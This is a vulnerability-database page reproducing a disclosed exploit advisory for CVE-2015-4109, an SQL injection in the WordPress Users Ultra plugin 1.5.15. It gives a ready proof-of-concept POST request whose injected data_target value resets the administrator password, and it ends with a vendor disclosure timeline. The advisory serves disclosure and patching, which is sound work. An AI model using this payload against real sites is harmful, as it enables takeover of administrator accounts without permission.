Lucene search
SecurityvulnsSECURITYVULNS:DOC:32173HistoryJun 08, 2015 - 12:00 a.m.
CVE-2015-4109 - WordPress Users Ultra Plugin [SQL injection]
2015-06-0800:00:00
vulners.com
10
Exploit Title: CVE-2015-4109 - WordPress Users Ultra Plugin [SQL injection]
Date: 2015/05/30
Exploit Author: Panagiotis Vagenas
Contact: https://twitter.com/panVagenas
Vendor Homepage: http://usersultra.com
Software Link: https://wordpress.org/plugins/users-ultra/
Version: 1.5.15
Tested on: WordPress 4.2.2
Category: webapps
CVE: CVE-2015-4109
One can perform an SQL injection attack simply by exploiting wp_ajax_nopriv_rating_vote action.
POST parameters data_target and data_vote can be used to execute arbitrary SQL commands in the database.
In the following PoC we change the administrators password to '1' so a malicious user can then login as the administrator, taking full control of the website.
- Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: action=rating_vote&data_id=1
&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1 - Login with administrator's user name and password '1'
Note that we assume that table name prefix is 'wp' and administrators user id is 1, a very common scenario.
- Timeline
2015-05-29 Discovered
2015-05-30 Vendor notified via contact form
2015-06-01 Vendor notified via email
2015-06-02 Vendor notified via support forums at wordpress.org
2015-06-02 Vendor responded
2015-06-04 Fix released in version 1.5.16
Related
wpvulndb
wpvulndb
Users Ultra <= 1.5.15 - SQL Injection
2015-06-04 00:00:00
patchstack
patchstack
WordPress Users Ultra Plugin <= 1.5.15 - Multiple SQL Injection
2015-05-28 00:00:00
packetstorm
packetstorm
WordPress Users Ultra 1.5.15 SQL Injection
2015-06-06 00:00:00
prion
prion
Sql injection
2015-06-09 14:59:00
cve
cve
CVE-2015-4109
2015-06-09 14:59:00
securityvulns
securityvulns
Related for SECURITYVULNS:DOC:32173